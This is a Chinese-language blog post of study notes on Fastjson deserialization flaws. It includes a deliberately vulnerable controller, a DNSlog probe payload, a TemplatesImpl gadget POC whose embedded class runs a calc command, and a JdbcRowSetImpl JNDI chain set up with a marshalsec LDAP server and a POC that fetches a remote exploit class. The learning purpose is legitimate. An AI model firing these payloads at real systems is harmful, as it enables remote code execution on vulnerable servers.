java中的接口是类吗
1861
2022-09-29
fastJson反序列化学习笔记(fastjson 自定义反序列化)
一、预备知识
FastJson是阿里巴巴开发的用于处理Json数据的类,可以将Json数据对象转换为字符串,也可以将字符串转换为Json对象,当将字符串还原为Json对象时常用的方法有parse()以及parseObject(),parseObject本质上是调用了parse方法,两者的不同之处在于parse方法在还原为Json对象时可以触发该类的set方法,而parseObject方法会触发set方法、get方法以及该类的构造方法,并且当该类中不存在set方法而存在get方法时,会调用 get方法。在还原为对象的时候为了能够很好的找到类的名称,因此引入了@type,其值为类的名称。
如下:
public String json7(String str){ String str2 = "{\"@type\":\"com.yang.pojo.Person\",\"age\":34,\"name\":\"张三\",\"sex\":\"男\"}"; //parse可以触发该类的set方法 System.out.println(JSONObject.parse(str2)); System.out.println(JSONObject.parseObject(str2)); return str; }
控制台输出:
{"sex":"男","name":"张三","age":34}
因此,当用户输入的内容如果以Json字符串传输到后台,后台对数据进行反序列化为对象的过程中,未对用户输入进行过滤,未过滤掉比如可能引起set或者get方法执行的类时,就可能产生代码执行漏洞了。
二、简单演示
(一) Controller演示代码:
这是演示的服务端controller的代码,用户通过前台输入一个字符串,后台使用parseObject()方法对字符串还原为对象,这里使用了Feature.SupportNonPublicField用于支持Private类型属性还原。
@RestControllerpublic class UserController { @RequestMapping("/j8") @ResponseBody public String json8(String str){ System.out.println("str:======================"+str); Object obj = JSONObject.parseObject(str,Feature.SupportNonPublicField); System.out.println("st:======================="+str); return str;
} }
(二) fastJson判断:
没有写前台表单,通过BURP将GET报文截取后修改为POST请求,注意需要在报文请求头中加入Content-type: application/x-www-form-urlencoded,否则controller无法通过参数获取到输入的内容。
通过报错可以判断是否使用了fastjson:
(三) 测试:
下面使用PAYLOAD:{"name":{"@type":"java.net.Inet4Address","val":"11agd8.dnslog.cn"}}去测试:
查看dnslog显示的信息:
除了上述外,安全研究人员目前发现两条利用链,分别是TemplatesImpl以及JdbcRowSetImpl,演示如下:
三、TemplatesImpl利用链
(一)POC:
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["evilBynarycode"],"_name":"a.b","_tfactory":{},"_outputProperties":{},""_version":"1.0","allowedProtocols":"all"}
其中_bytecodes值evilBynarycode就是PAYLOAD的class文件进行BASE64编码后得到的内容,PAYLOAD为:
public class Shell extends AbstractTranslet { public Shell(){ try { Runtime.getRuntime().exec("calc"); }catch (IOException e){ e.printStackTrace(); } } @Override public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { } @Override public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }}
(二)浏览器访问,抓包发送POC:
这里注意POC中包含有特殊字符,这是我标红了为“+”号,如果通过前台传入,需要使用URL编码为:%2B,否则会报错。
(三)简要分析
1、注意POC中的几个关键字:
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["evilBynarycode"],"_name":"a.b","_tfactory":{},"_outputProperties":{},""_version":"1.0","allowedProtocols":"all"}都是键值对,其中几个关键的:@type指明了该类的名称,_bytecodes指定了恶意payload,_name的值为a.b,_tfactory的值为空,_outputProperties的值为空。
2、调试:
在JSONObject.parseObject上打断点:
跟进后看到调用了parse()方法:
继续跟进,看到这里创建了一个反序列化器对象:
进入到deserializer方法中去,里面有两个方法的重载,然后进入到matchField判断,默认为false,取反后,执行If语句,然后通过lexer.scanSymbol(parser.symbolTable)进行符号扫描,得到key为_bytecodes:
创建一个TemplatesImpl对象:
将bytecodes的值赋值给Templates对象:
继续跟进,可以看到这里在对前述几个关键字进行循环处理,这里轮到了_name,如下:
再继续往下,看到轮到了_tfactory,其值为空:
继续往下处理_outputProperties,跟进后到达pareseField方法:
里面的smartMatch()对Key做了一些处理,这里对下划线和中横线都进行了处理,替换为空了:
继续跟进看到setValue方法:
这里看到method.invoke()方法,强制跟入:
进入到invoke方法中:
执行ma.invoke(obj,args),这里强制跟入:
继续,看到invoke0()方法:
再次强制跟入看到执行newTransformer类的getOutputProperties()方法:
再下一步弹出计算器。
这个代码中间比较复杂,跟踪了很多次代码,一直是一知半解,前面涉及到对base64的解码,涉及到对下划线的替换处理等过程,在这个主调试过程中可能没有复现。个人理解,总的来讲,中间一直在对几个关键字进行循环处理,直到处理outputProperties时,进入到setValue方法中可以看到反序列化方法中的invoke()方法,在这里强制跟踪,可以找到调用getOutputProperties()方法,而这个方法会触发执行前面的PAYLOAD。
四、JdbcRowSetImpl利用链
该利用链与之前提到过的JNDI及RMI远程调用相关,原理为先搭建一个恶意的LDAP/RMI服务器,当用户输入的信息未经过滤而向LDAP/RMI服务器发起请求时,LDAP/RMI服务器返回一个恶意的httpserver请求给存在缺陷的服务器,存在缺陷的服务器再次向恶意的httpserver请求下载恶意的class文件,并且该文件被执行。
(一) 准备PAYLOAD,命名为exploit.java,并且将其编译为exploit.class文件:
(二)将exploit.class文件放在-m 80
Serving HTTP on :: port 80 (...
(三)开启LDAP server
D:\>java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#exploit 8099
Listening on 0.0.0.0:8099
(四)准备POC
{"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://127.0.0.1:8099/exploit",
"autoCommit":true
}
(五)将POC通过POST请求发送出去,弹出计算器
五、总结
本文主要记录学习fastJson反序列号相关的内容,几条利用链的复现过程跟着网上的教程操作就可以了,不是特别难,比较难的是代码的跟踪过程,笔者也是初学者,网上的视频、博客看了很多遍也跟不上节奏,里面的代码跟踪过程也是一知半解,终于把这篇浅陋的笔记写完了。
版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。
发表评论
暂时没有评论,来抢沙发吧~